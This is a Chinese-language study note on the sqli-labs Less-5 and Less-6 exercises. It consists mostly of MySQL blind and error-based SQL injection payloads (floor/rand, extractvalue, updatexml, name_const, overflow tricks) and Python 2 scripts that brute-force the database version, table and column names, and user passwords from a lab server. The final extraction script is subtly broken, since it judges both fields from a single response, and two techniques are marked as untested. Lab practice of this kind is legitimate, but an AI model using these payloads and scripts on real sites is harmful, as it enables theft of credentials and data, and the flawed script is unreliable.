之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
报错型 SQL 盲注
函数讲解
-
盲注用到的函数
rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 floor(2.5) == 2 count()统计元组的个数 concat 字符串连接 extractvalue(最长32位) updateXml(最长32位)
Less-5 使用脚本爆破注入
Less-6 使用 floor(rand(x)*2) 报错注入
注入方法##
下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举)
-
布尔型盲注手法,按位爆破
- left()
- ascii()、substr()
- regexp
- ord()、mid()
?id=1’and left((select version() limit 0,1),1)=‘s’#
-
利用 floor(rand(x)*2) 的执行bug进行报错注入
?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
-
利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#
?id=1" and extractvalue(1,concat(0x7e,(database())))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
-
利用 updatexml() 函数报错注入(有长度限制,最长32位)
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
-
利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
-
利用 double 数值类型超出范围进行报错注入
?id=1" union select (exp(~(select * from(select user())a))),2,3#
未测试成功
-
利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)
基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)
未测试成功
?id=1" union select (!(select * from (select user())x) - ~0),2,3#
下面为句式:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
-
一个句式组合:
(select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)
遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)# ?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))# ?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)# ?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)# ?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x # ?id=1" union select (exp(~(select * from(select user())a))),2,3# and so on...
Less-5 基于错误的sql盲注-单引号
-
测试
?id=1 正常 ?id=1" 正常 ?id=1' 报错 下面使用布尔的 SQL 盲注
-
猜数据库的版本
?id=1'and left(version(),1)=4--+ ?id=1'and left(version(),1)=5--+ # 结果为 5.0.51a3ubuntu5
脚本运行
# -*- coding: utf-8 -*- # filename:Less05-1 database_version.py import hackhttp import re def database_version(arg): print "database_version start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') version="" for i in range(1,20): for j in payloads: hh = hackhttp.hackhttp() msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: version+=j print "第%s位是%s" % (i,j) break print "数据库的版本为: {version}".format(version=version) if __name__ == '__main__': database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据库的长度
?id=1'and length(database())=7--+ ?id=1'and length(database())=8--+ # 结果为 8
脚本运行
# -*- coding: utf-8 -*- # filename:Less05-2 database_length.py import hackhttp import re def database_length(arg): print "database_length start test..." length="" for j in range(1,20): hh = hackhttp.hackhttp() msg = "1%27and%20length(database())={j}--+".format(j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: length=j break print "数据库的长度为: {length}".format(length=length) if __name__ == '__main__': database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据库名
?id=1' and mid(database(),1,1)="a"--+ ?id=1' and mid(database(),1,1)="b"--+ # 结果为 security
脚本运行
# -*- coding: utf-8 -*- # filename:Less05-3 database_name.py import hackhttp import re def database_name(arg): print "database_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') name="" for i in range(1,20): for j in payloads: hh = hackhttp.hackhttp() msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: name+=j print "第%s位是%s" % (i,j) break print "数据库的版本为: {name}".format(name=name) if __name__ == '__main__': database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜表名
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80–+
?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80–+
结果为 emails, ussers
运行脚本
# -*- coding: utf-8 -*- # filename:Less05-4 table_name.py import hackhttp import re def table_name(arg): print "table_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') table_name="" database_name="" for k in range(10): for i in range(1,10): for j in range(65,122): hh = hackhttp.hackhttp() msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: table_name+=chr(j) #database_name+=str(k+1) print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j) break table_name+=" " print "security 数据库的表名为: {table_name}".format(table_name=table_name) if __name__ == '__main__': table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜列名
?id=1’and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^pass’ limit 0,1)–+
?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65–+
?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65–+
结果为 id username password
执行脚本
# -*- coding: utf-8 -*- # filename:Less05-5 column_name.py import hackhttp import re def column_name(arg): print "column_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') column_name="" for k in range(10): for i in range(1,15): for j in range(65,122): hh = hackhttp.hackhttp() msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+msg) count = re.findall("You are in",body) if 'You are in' in count: column_name+=chr(j) print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j) break column_name+=" " print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name) if __name__ == '__main__': column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据
?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68–+
?id=1’and ascii(substr((select username from security.users limit 0,1),1,1))=68–+
执行脚本
# -*- coding: utf-8 -*- # filename:Less05-5 data.py import hackhttp import re def data(arg): print "data start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') username="" password="" for k in range(14): for i in range(1,15): for j in range(48,122): hh = hackhttp.hackhttp() username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j) password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg+username_msg) code, head, body, redirect_url, log = hh.http(arg+password_msg) username_count = re.findall("You are in",body) password_count = re.findall("You are in",body) if 'You are in' in username_count: username+=chr(j) print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j) if 'You are in' in password_count: password+=chr(j) print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j) break username+=" " password+=" " print "security 数据库的 user 表的username为: {username}".format(username=username) print "security 数据库的 user 表的password为: {password}".format(password=password) if __name__ == '__main__': data('http://10.10.10.137/sqli-labs/Less-5/?id=')
Less-6 基于错误的sql盲注-双引号
floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))
牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注
-
测试
?id=1 正常 ?id=1' 正常 ?id=1" 报错
下面使用基于报错的 SQL 盲注
公式:
?id=1’ union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a–+
例如:
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+
?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a–+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+
有的时候 union 联合查询无法使用,则可以使用 and
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
-
猜数据库
?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+
-
查表的个数
?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a–+
-
查表名
?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
-
查列数
?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
-
列名
?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+
-
查数据
?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security. users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+